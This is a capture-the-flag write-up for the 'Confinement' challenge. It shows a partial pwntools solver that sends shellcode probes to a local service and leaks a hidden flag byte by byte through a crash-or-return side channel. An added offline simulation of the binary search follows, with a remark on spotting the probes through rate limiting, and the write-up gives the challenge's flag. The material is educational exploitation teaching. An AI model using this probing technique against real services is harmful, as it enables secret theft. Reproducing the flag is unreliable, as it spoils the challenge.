Confinement

Challenge

Payload length limits rule out exfiltrating the data directly and force a side-channel approach: the solver builds tiny shellcode probes, each of which compares one byte of the hidden data against an immediate and either returns cleanly or crashes, and recovers the data with a byte-wise binary search over those one-bit answers.

Solution

Key solve code:

from pwn import *

# elf (the challenge ELF), payload(index, imm) and h are defined in the full
# solver and not shown here; h is the sorted list of candidate byte values.
main_ret = 0x222c6
flag = elf.sym["FLAG"]
shift = flag - main_ret  # distance from main's saved return address to FLAG

# Probe: read the saved return address, rebase it to FLAG, compare one byte
# against an immediate and return cleanly only if the byte is larger;
# otherwise fall off the end (kaboom) and crash. payload() builds the probe
# for a given byte index and immediate.
s = asm(f"""
mov rax, [rsp]
add rax, {shift}
cmp BYTE PTR [rax + 0xff], 0xfe
jbe kaboom
ret
kaboom:
""")

def test(index, imm):
    # True when the clean-return path was taken, i.e. byte[index] > imm
    p = remote("localhost", 1337)
    p.send(payload(index, imm))
    res = p.recvline().startswith(b"adios")
    p.close()
    return res

def binary_search(pos):
    # Lower-bound search over h: smallest candidate c with byte[pos] <= c
    lo, hi = 0, len(h)
    while lo != hi:
        mid = (lo + hi) // 2
        if test(pos, h[mid]):
            lo = mid + 1
        else:
            hi = mid
    return h[lo]
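To make the search itself easy to study without the challenge binary or any network traffic, here is an added example that is not part of the writeup's solver. It replaces the remote probe with an in-process oracle that answers only "is the byte at this position greater than this immediate?", runs the same lower-bound binary search over all 256 byte values, and counts the queries. The secret is a constructed stand-in, and the oracle and helper names are this example's own.

```python
# Added example, not the writeup's solver: the comparison oracle is simulated
# in-process, so the search can be studied offline with no binary or network.

SECRET = b"gigem{constructed_sample}"  # constructed stand-in for the hidden data


class ComparisonOracle:
    """Answers one question per query: is secret[pos] > imm?

    This is all the probe's cmp/jbe pair leaks (clean return vs crash),
    one bit per connection. The counter is the cost of the leak, which is
    also what shows up as a burst of short-lived connections on the service.
    """

    def __init__(self, secret):
        self._secret = secret
        self.queries = 0

    def test(self, pos, imm):
        self.queries += 1
        return self._secret[pos] > imm


def search_byte(oracle, pos, candidates=range(256)):
    """Lower-bound binary search: smallest candidate c with secret[pos] <= c,
    which is secret[pos] itself when all 256 values are candidates."""
    h = list(candidates)
    lo, hi = 0, len(h)
    while lo != hi:
        mid = (lo + hi) // 2
        if oracle.test(pos, h[mid]):  # secret byte lies above h[mid]
            lo = mid + 1
        else:
            hi = mid
    return h[lo]


def recover(oracle, length):
    """Recover `length` bytes, one binary search per byte."""
    return bytes(search_byte(oracle, i) for i in range(length))


if __name__ == "__main__":
    oracle = ComparisonOracle(SECRET)
    data = recover(oracle, len(SECRET))
    print(data, "recovered in", oracle.queries, "queries")
```

With 256 candidates the lower-bound search needs at most ceil(log2(257)) = 9 queries per byte, so a 25-byte secret costs well under 256 connections, compared with up to 256 per byte for a value-by-value scan; that per-byte budget is the number to keep in mind when deciding whether connection rate limiting or crash-count alerting would catch a probe of this shape.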

Flag

gigem{3xf1l_5ucc3ss!}